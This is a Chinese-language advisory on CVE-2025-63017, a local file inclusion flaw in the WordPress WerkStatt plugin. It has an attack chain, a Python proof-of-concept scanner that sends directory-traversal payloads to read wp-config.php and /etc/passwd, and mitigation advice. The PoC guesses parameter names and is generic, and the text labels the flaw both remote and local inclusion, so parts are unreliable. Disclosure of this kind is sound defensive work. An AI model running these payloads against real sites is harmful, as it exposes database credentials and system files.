CVE-2025-63017 WerkStatt Plugin本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-63017

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

fuelthemes WerkStatt Plugin (werkstatt-plugin)

漏洞概述

CVE-2025-63017是WordPress WerkStatt插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含（Local File Inclusion）类型，存在于WerkStatt插件的PHP文件中。由于程序对文件名缺乏适当的控制验证，攻击者可以通过构造恶意请求，利用include或require语句包含服务器上的任意本地文件。此漏洞允许攻击者在不需要高权限的情况下（低权限即可），通过网络远程利用，无需用户交互即可实现攻击。漏洞影响机密性、完整性和可用性三个方面，均为高影响级别。攻击复杂度为高，需要特定的攻击条件。该漏洞由Patchstack安全团队的[email protected]发现并报告，披露日期为2026年1月22日。

技术细节

该漏洞是典型的PHP本地文件包含（Local File Inclusion）问题。在WerkStatt插件的PHP代码中，程序使用include或require语句动态加载文件时，未对用户可控的输入参数进行充分的过滤和验证。攻击者可以通过URL参数或POST数据传递恶意的文件路径值，利用目录遍历技术（如使用../）读取服务器上的敏感文件，例如：1. 读取wp-config.php获取数据库凭据和WordPress盐值；2. 读取/etc/passwd获取系统用户信息；3. 读取其他插件或主题文件获取更多漏洞利用信息。在某些配置下，攻击者还可以结合PHP伪协议（如php://filter、data://）实现远程代码执行或直接执行恶意代码。CVSS向量显示攻击复杂度为高，表明利用可能需要特定的环境条件或配置。修复方案应包括：对所有文件包含操作进行严格的输入验证，使用白名单机制限制可包含的文件范围，避免直接使用用户输入作为文件路径。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress CMS，并确认安装了WerkStatt插件（版本<=1.6.6）

STEP 2

步骤2

攻击者探测插件中存在的文件包含漏洞，识别可利用的参数（如template、page、file等）

STEP 3

步骤3

攻击者构造恶意请求，使用目录遍历payload（如../../../../wp-config.php）尝试读取服务器敏感文件

STEP 4

步骤4

成功读取wp-config.php获取数据库凭据、WordPress盐值等敏感配置信息

STEP 5

步骤5

利用获取的凭据进一步渗透数据库，或结合其他漏洞实现远程代码执行

STEP 6

步骤6

在某些配置下，攻击者可利用PHP伪协议（如data://）直接写入并执行恶意PHP代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-63017 PoC - WerkStatt Plugin Local File Inclusion
# Target: WordPress site with WerkStatt Plugin <= 1.6.6

import requests
import sys

target = input("Enter target URL (e.g., http://target.com): ").rstrip('/')

# Common vulnerable parameter patterns for WerkStatt plugin
vulnerable_params = [
    'template',
    'page',
    'file',
    'include',
    'view'
]

# Sensitive files to test
test_files = [
    '../../../../wp-config.php',
    '../../../../../etc/passwd',
    '../../../../../../etc/passwd',
    '../wp-config.php',
    '../wp-includes/functions.php'
]

def test_lfi(url, param, payload):
    try:
        test_url = f"{url}/?{param}={payload}"
        response = requests.get(test_url, timeout=10)
        
        # Check for sensitive file signatures
        if 'DB_NAME' in response.text or 'DB_USER' in response.text:
            print(f"[+] VULNERABLE! Found wp-config.php content")
            return True
        if 'root:' in response.text and '/bin/' in response.text:
            print(f"[+] VULNERABLE! Found /etc/passwd content")
            return True
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
    return False

print("[*] Testing WerkStatt Plugin LFI vulnerability...")
for param in vulnerable_params:
    for payload in test_files:
        print(f"[*] Testing: {param}={payload}")
        if test_lfi(target, param, payload):
            print("[!] Vulnerability confirmed!")
            break

print("[*] Scan complete.")

影响范围

WerkStatt Plugin <= 1.6.6

防御指南

临时缓解措施

立即将WerkStatt插件升级到开发者发布的安全修复版本。如果暂时无法升级，可在Web服务器层面配置URL参数过滤，阻止包含../等目录遍历字符的请求。同时建议使用WAF产品（如Wordfence、Sucuri等）提供额外的安全防护层，并限制插件目录的访问权限。定期审计代码中的文件包含操作，确保所有用户输入都经过严格的验证和过滤。